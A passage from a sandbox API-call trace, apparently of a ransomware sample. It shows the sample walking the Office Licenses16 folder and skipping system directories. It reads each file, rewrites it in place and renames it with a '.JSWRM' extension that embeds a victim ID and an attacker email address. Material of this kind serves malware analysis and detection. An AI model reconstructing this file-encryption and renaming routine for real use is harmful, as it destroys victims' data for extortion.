dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.715] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56f5a42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe56f5a42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5800a85, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67ad, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription1-ppd.xrm-ms", cAlternateFileName="O365HO~2.XRM")) returned 1 [0104.715] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2=".") returned 1 [0104.715] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="..") returned 1 [0104.715] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="...") returned 1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="windows") returned -1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.716] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0104.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0104.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0104.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0104.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0104.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0104.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.717] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26541) returned 1 [0104.717] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24c1d0 [0104.717] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67a0, lpOverlapped=0x0) returned 1 [0104.719] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.720] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67a0, lpOverlapped=0x0) returned 1 [0104.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.720] CloseHandle (hObject=0x45c) returned 1 [0104.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0104.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0104.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0104.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0104.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0104.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0104.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.720] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0104.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0104.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0104.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.721] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe61d6728, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe61d6728, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe626f052, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription1-ul-oob.xrm-ms", cAlternateFileName="O3EC08~1.XRM")) returned 1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.721] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.722] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.722] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.722] lstrcmpiW (lpString1="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0104.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0104.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0104.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0104.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0104.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0104.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0104.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.722] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11651) returned 1 [0104.723] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0104.723] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0104.725] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.725] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0104.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.725] CloseHandle (hObject=0x45c) returned 1 [0104.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0104.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0104.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0104.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0104.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0104.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.726] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0104.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0104.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.727] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5a893f7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5a893f7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5b6e14c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription2-pl.xrm-ms", cAlternateFileName="O394D6~1.XRM")) returned 1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2=".") returned 1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="..") returned 1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="...") returned 1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="windows") returned -1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="recovery") returned -1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.727] lstrcmpiW (lpString1="O365HomePremR_Subscription2-pl.xrm-ms", lpString2="msocache") returned 1 [0104.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0104.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0104.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0104.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0104.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0104.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0104.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.728] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0104.728] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0104.728] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.730] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.730] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.730] CloseHandle (hObject=0x45c) returned 1 [0104.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0104.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0104.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0104.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 